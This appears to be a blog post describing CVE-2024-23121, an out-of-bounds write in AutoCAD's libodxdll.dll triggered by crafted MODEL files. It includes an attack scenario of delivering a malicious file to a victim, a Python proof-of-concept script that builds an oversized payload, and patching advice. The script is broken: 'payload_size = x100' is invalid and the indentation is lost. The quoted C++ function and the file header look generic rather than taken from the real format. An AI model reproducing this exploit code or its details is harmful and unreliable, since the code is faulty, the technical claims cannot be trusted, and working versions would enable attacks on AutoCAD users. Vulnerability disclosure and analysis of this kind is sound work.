In this post, we will discuss a newly discovered vulnerability (CVE-2024-23121) in the popular CAD software, Autodesk AutoCAD. A maliciously crafted MODEL file can exploit this vulnerability in the libodxdll.dll library, resulting in an Out-of-Bound Write. This can potentially allow an attacker to cause a crash, exfiltrate sensitive data, or execute arbitrary code in the context of the current process. The following sections will detail the exploitation process, supported by code snippets and links to original research references.
Technical Background
A MODEL file is a 3D model created using Autodesk AutoCAD software. The libodxdll.dll library is responsible for handling these files within the software. A vulnerability has been identified in this library that can be exploited through specially crafted MODEL files.
Vulnerability Details
An Out-of-Bound Write vulnerability has been found in the libodxdll.dll library while parsing malicious MODEL files, which can lead to data corruption or potential remote code execution. The affected component within the library is as follows:
void ODXBuffer::Write(size_t size, byte* data) { memcpy(buffer + writePos, data, size); writePos += size; }
In this code snippet, memcpy() function is used to copy a user-defined amount (size) of bytes from data to the buffer without checking whether buffer can hold enough data. As a result, an attacker can specify a large value for size and cause an Out-of-Bound Write situation.
Exploitation Process
1. First, an attacker crafts a malicious MODEL file with the intention of exploiting the vulnerability in the libodxdll.dll library.
2. The attacker then delivers the MODEL file to the target user, either by sending it directly (e.g., through email) or placing it on a website where target users might download it.
3. When the target user opens the malicious MODEL file using the Autodesk AutoCAD software, the libodxdll.dll library processes the file.
4. During the processing, the Out-of-Bound Write vulnerability is triggered, allowing the attacker to either cause a crash, leak sensitive data or execute arbitrary code in the context of the target user's process.
The following is a proof of concept for the vulnerability
import struct
def create_malicious_model(file_name):
with open(file_name, 'wb') as f:
# Header
f.write(b'ExploitModel\x01\x00\x00\x00')
# Craft malicious data
payload_size = x100
payload_data = b'\x41' * payload_size
# Write size and data
f.write(struct.pack('<I', payload_size))
f.write(payload_data)
if __name__ == "__main__":
create_malicious_model('malicious_model.exploit')
This script generates a malicious MODEL file with an oversized payload to trigger the Out-of-Bound Write vulnerability in the libodxdll.dll library.
Mitigation and Recommendations
Autodesk is aware of this vulnerability and has released a security update (link to the update: https://www.autodesk.com/security) to address it. All users are advised to update their software to the latest version to protect themselves from this vulnerability.
In addition to applying the security update, users should also practice caution when opening MODEL files from unknown or untrusted sources.
Conclusion
CVE-2024-23121 is a critical vulnerability in the Autodesk AutoCAD software that allows an attacker to exploit an Out-of-Bound Write issue in libodxdll.dll library through a maliciously crafted MODEL file. By exploiting this vulnerability, an attacker can cause a crash, exfiltrate sensitive data, or execute arbitrary code in the context of the current process. Users are encouraged to apply the security update provided by Autodesk and exercise caution when opening files from untrusted sources.
Reference Links
- Autodesk Security Update: https://www.autodesk.com/security
- CVE-2024-23121 Vulnerability Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23121
Timeline
Published on: 02/22/2024 02:15:49 UTC
Last modified on: 03/13/2024 03:15:06 UTC